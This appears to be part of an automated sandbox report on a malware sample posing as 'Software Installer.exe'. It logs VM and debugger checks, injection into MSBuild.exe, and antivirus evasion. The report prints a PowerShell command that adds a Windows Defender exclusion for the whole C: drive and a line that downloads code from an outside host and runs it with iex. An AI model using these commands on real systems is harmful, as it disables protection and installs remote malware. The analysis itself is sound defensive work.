Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeMemory allocated: 196DC750000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Software Installer.exeWindow / User API: threadDelayed 850Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeWindow / User API: threadDelayed 824Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeWindow / User API: threadDelayed 3418Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7401Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2195Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4838Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1774Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5685
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1458
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140Thread sleep count: 7401 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140Thread sleep count: 2195 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1364Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep count: 4838 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep count: 1774 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1652Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1428Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep count: 5685 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288Thread sleep count: 1458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1940Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\Software Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDDA96C FindFirstFileExW,11_2_00007FF7ECDDA96C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware workstation
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hyper-v video
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: No Windows Defender found. Skipping AMSI bypass. Installed AVs: Fake Method 1 executed.Fake Method 2 executed.Inner Method executed.000000000000vmware svgavirtualbox graphics adapterqemu vgaparallels display adapterxen framebufferAdd-MpPreference -ExclusionPath ''powershell.exe[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex-ExecutionPolicy Bypass -Command ""Error: runas\\.\root\SecurityCenter2SELECT * FROM AntiVirusProductdisplayName
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware svga
Source: MSBuild.exe, 0000000D.00000002.1760406613.00000000010C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp2
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0E69000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: `JAevZX1PkJw6rmn08YHO1BU8O533Dv20CASFFLDs8ghy19WDoW1EMRzg3Udarb6uKF6DdkPGCZsSip4xbRBiwGAnYvmcIwQi`$
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware fusion
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hyper-v
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware player
Source: MSBuild.exe, 0000000D.00000002.1760579162.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu vga
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
Source: Software Installer.exe, 00000000.00000003.2138571362.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.2437966605.000001D776E21000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1911748693.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653541198.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1758956113.000001D776E21000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000003.1763608180.000001D776E40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1508507784.0000011AFAB7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C17000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C09000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware virtual
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0E69000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: `JAevZX1PkJw6rmn08YHO1BU8O533Dv20CASFFLDs8ghy19WDoW1EMRzg3Udarb6uKF6DdkPGCZsSip4xbRBiwGAnYvmcIwQi
Source: C:\Users\user\Desktop\Software Installer.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00449B30 LdrInitializeThunk,13_2_00449B30
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD25E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7ECDD25E4
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDDD7BC GetProcessHeap,11_2_00007FF7ECDDD7BC
Source: C:\Users\user\Desktop\Software Installer.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD25E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7ECDD25E4
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD61C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7ECDD61C0
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD1FB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7ECDD1FB4
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD2788 SetUnhandledExceptionFilter,11_2_00007FF7ECDD2788
Source: C:\Users\user\Desktop\Software Installer.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\Software Installer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex"
Contains functionality to inject code into remote processes
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD1560 GetModuleHandleW,GetModuleFileNameA,_fread_nolock,FreeConsole,CreateProcessA,VirtualAlloc,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,11_2_00007FF7ECDD1560
Injects a PE file into a foreign processes
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
